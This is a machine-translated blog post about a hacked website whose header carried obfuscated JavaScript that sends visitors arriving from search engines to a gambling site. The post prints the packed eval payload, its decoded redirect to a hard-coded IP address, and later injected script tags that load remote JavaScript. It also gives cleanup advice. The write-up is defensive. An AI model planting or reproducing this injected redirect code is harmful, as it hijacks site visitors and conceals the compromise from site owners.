当前位置:网站首页>Remember the experience of automatically jumping to spinach station when the home page was tampered with
Remember the experience of automatically jumping to spinach station when the home page was tampered with
2022-07-03 21:22:00 【Magical star anise】
Preface #
A few days ago , Baidu search former owner's website , Suddenly found the website description It becomes the introduction of spinach station , This is a black rhythm .
Specifically, when you click to enter from the search engine , Will automatically jump to the spinach station , Directly enter the URL to access without jumping ,
screening #
All problems are under the source code , There is no hiding , Such jump , Usually in header in , This jump is fast , Sure enough , stay header Found a piece of code in , as follows
It is ENV Encrypted , It's not convenient to read .
eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('2.3("<4 8=\\"a\\">");2.3("d s=2.6");2.3("7(s.1(\\"9\\")>0 || s.1(\\"b\\")>0 || s.1(\\"c\\")>0 ||s.1(\\"r\\")>0 ||s.1(\\"e\\")>0 ||s.1(\\"f\\")>0 ||s.1(\\"g\\")>0 ||s.1(\\"h\\")>0 )");2.3("i.j=\\"k://l.m.n.o:p/q.5\\";");2.3("</4>");',29,29,'|indexOf|document|writeln|script|html|referrer|if|LANGUAGE|baidu|Javascript|sogou|soso|var|uc|bing|yahoo|so|location|href|http|103|37|233|13|888|bcs|sm|'.split('|'),0,{}))
After decryption
<script LANGUAGE="Javascript">;
var s=document.referrer;
if(s.indexOf("baidu")>0 || s.indexOf("sogou")>0 || s.indexOf("soso")>0 ||s.indexOf("sm")>0 ||s.indexOf("uc")>0 ||s.indexOf("bing")>0 ||s.indexOf("yahoo")>0 ||s.indexOf("so")>0 )
location.href="http://103.37.233.13:888/bcs.html";
</script>
principle #
- Get sources
- Whether the match comes from a qualified search engine
- If yes, jump to the specified page
It can be seen that the search engine matching this code basically covers the domestic mainstream ( Baidu , sogou ,360 Search for , What a horse ,uc,bing, Yahoo ), As long as you search through these browsers , Will jump to the spinach station .
And directly enter the website , Does not trigger a jump , So there is a certain degree of concealment
Solution #
- Will this period of js Just delete the code
- Check for server or program vulnerabilities , Check why it was invaded , Now the server is mined , It's also very common , After being blacked out , Pay more attention to whether it is mined
follow-up #
Found that they upgraded , Insert in the head
<script type="text/javascript" rel="nofollow" src="http://103.30.4.96:7889/js/SCur.js" ></script>
They also joined Baidu statistics
var _hmt = _hmt || [];
(function() {
var hm = document.createElement("script");
hm.src = "https://hm.baidu.com/hm.js?9a4c62a1985e8fbd8d0ce7c1a54070d1";
var s = document.getElementsByTagName("script")[0];
s.parentNode.insertBefore(hm, s);
})();
document.write("<script language=\"javascript\" type=\"text/javascript\" src=\"http://103.30.4.96:7889/js/PicLeft.js\"></script>");
The principle is still the same , However, statistics are added , It may be more convenient to monitor the number of views , Jump more times , It is also convenient for them to change the control script
I sent a reminder to my former colleagues , I searched the station , There are not a few websites hacked by similar methods , Give some websites with contact information , By the way, I sent a reminder , I want to receive a thank you , result .........
边栏推荐
- 不同业务场景该如何选择缓存的读写策略?
- How to choose cache read / write strategies in different business scenarios?
- Qt6 QML Book/Qt Quick 3D/基础知识
- Tidb's initial experience of ticdc6.0
- 90 后,辞职创业,说要卷死云数据库
- 请教大家一个问题,用人用过flink sql的异步io关联MySQL中的维表吗?我按照官网设置了各种
- What should the future of the Internet be like when Silicon Valley employees flee the big factory and rush to Web3| Footprint Analytics
- 技术管理进阶——如何在面试中考察候选人并增大入职概率
- Sort out several network request methods of JS -- get rid of callback hell
- Baohong industry | good habits that Internet finance needs to develop
猜你喜欢

Software testing skills, JMeter stress testing tutorial, obtaining post request data in x-www-form-urlencoded format (24)

XAI+网络安全?布兰登大学等最新《可解释人工智能在网络安全应用》综述,33页pdf阐述其现状、挑战、开放问题和未来方向
![[Yugong series] go teaching course 002 go language environment installation in July 2022](/img/47/35b4fb0354122e233977b261ef405b.png)
[Yugong series] go teaching course 002 go language environment installation in July 2022

Reinforcement learning - learning notes 1 | basic concepts

Common SQL sets

Talk about daily newspaper design - how to write a daily newspaper and what is the use of a daily newspaper?

The "boss management manual" that is wildly spread all over the network (turn)
![抓包整理外篇——————autoResponder、composer 、statistics [ 三]](/img/bf/ac3ba04c48e80b2d4f9c13894a4984.png)
抓包整理外篇——————autoResponder、composer 、statistics [ 三]

Custom view incomplete to be continued

17 websites for practicing automated testing. I'm sure you'll like them
随机推荐
MySQL——索引
How to choose cache read / write strategies in different business scenarios?
MySQL——SQL注入问题
Experience summary of database storage selection
Global and Chinese market of wall mounted kiosks 2022-2028: Research Report on technology, participants, trends, market size and share
鹏城杯 WEB_WP
Sort out several network request methods of JS -- get rid of callback hell
Analyse de REF nerf
University of Electronic Science and technology | playback of clustering experience effectively used in reinforcement learning
Borui data and Sina Finance released the 2021 credit card industry development report
Collections SQL communes
MySQL——规范数据库设计
Etcd raft Based Consistency assurance
Apprentissage intensif - notes d'apprentissage 1 | concepts de base
Capture de paquets et tri du contenu externe - - autoresponder, composer, statistiques [3]
Hcie security Day11: preliminarily learn the concepts of firewall dual machine hot standby and vgmp
Selenium has three waiting methods (forced waiting, implicit waiting, and display waiting)
Mysql - - Index
Global and Chinese market of telematics boxes 2022-2028: Research Report on technology, participants, trends, market size and share
MySQL——索引